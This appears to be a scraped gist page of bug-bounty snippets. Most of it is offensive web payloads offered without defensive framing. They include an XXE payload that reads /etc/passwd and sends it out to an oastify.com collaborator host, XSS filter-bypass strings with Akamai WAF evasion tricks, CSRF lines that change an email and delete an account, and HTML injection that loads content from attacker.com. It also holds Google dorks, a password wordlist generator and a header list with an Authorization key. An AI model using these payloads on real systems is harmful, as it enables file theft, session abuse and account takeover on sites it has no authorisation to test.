This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % file SYSTEM "file:///etc/passwd"> | |
| <!ENTITY % eval "<!ENTITY exfil SYSTEM 'http://%file%.h6ojcmzsjqtnjvjyv6als7vbl2rtfp3e.oastify.com/'>"> | |
| %eval; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##Rare Cases | |
| */</script><script>alert()/* | |
| 'href=javascript:alert()>click me<a/y=' | |
| "autofocus onclick=’alert()' | |
| Akamai Tricks & Tips | |
| * alert() => window['alert']() | |
| * alert() => this['alert']() | |
| * alert() => (alert)() | |
| * alert() => eval(atob('YWxlcnQoKQ==')) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| __type(name: "TableauUser") { | |
| name | |
| kind | |
| fields { | |
| name | |
| type { | |
| name | |
| kind | |
| ofType { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://example.com/page?path=<img src="/[email protected]"> | |
| https://example.com/page?path=<iframe src="/delete-account?confirm=true" style="display:none;"> | |
| fetch('/action?param=value', { credentials: 'include' }); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <img src="javascript:fetch('//attacker.com/test.html').then(r=>r.text()).then(t=>document.body.innerHTML=t)"> | |
| <img src=x style="content:url('http://attacker.com/test.html')"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://docs.google.com/forms/d/1gvftw9m8pnl7NlyVArfTS2kLISoYsG29sYtZy7HmRbs/edit | |
| https://docs.google.com/forms/d/1AlTAcrpvLAklwP2yfONZmqcE0AO8DbwQ8KSvl-O5ktA/edit | |
| https://docs.google.com/forms/d/1gIP_e54wvGBDBLH7C3fCVICWbRH_K0H5mKlgtNQOQVU/edit | |
| https://docs.google.com/forms/d/1Qcqnvdy2sfd5xBa1loTrFN1SRnBIa_oMmQnWuzoWTNQ/edit | |
| https://docs.google.com/forms/d/16gC6TfSJCxJTjHEjvvVsD2H3fogPwW9Gr8rKx0ljt9A/edit |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!python2 | |
| #!/usr/bin/env python2 | |
| # -*- coding:utf-8 -*- | |
| from burp import IBurpExtender, ITab | |
| from burp import IContextMenuFactory | |
| # from java.awt import Color | |
| from javax.swing import JMenuItem | |
| from javax.swing import JPanel | |
| from javax.swing import JLabel,JTextField,JButton |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import itertools | |
| import random | |
| special_chars = "!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~" | |
| words = ["example", "password", "security", "test", "random"] | |
| years = [str(year) for year in range(2000, 2031)] | |
| with open("wordlist.txt", "w") as f: | |
| for _ in range(1000): # Change 1000 to however many combinations you want | |
| specials = ''.join(random.choices(special_chars, k=4)) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://stragwxnwe01.ah.nl/ | |
| https://golden.com/home | |
| inurl /bug bounty | |
| inurl : / security | |
| inurl:security.txt | |
| inurl:security "reward" | |
| inurl : /responsible disclosure | |
| inurl : /responsible-disclosure/ reward | |
| inurl : / responsible-disclosure/ swag | |
| inurl : / responsible-disclosure/ bounty |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| x-forwarded-scheme | |
| x-forwarded-host | |
| \ | |
| Authorization: SharedKeyLite myaccount:ctzMq410TV3wS7upTBcunJTDLEJwMAZuFPfr0mrrA08= | |
| x-forwarded-Proto | |
| x-http-method-override | |
| x-amz-website-redirect-location | |
| X-host | |
| X-Forwarded-Host | |
| X-Forwarded-Server |
NewerOlder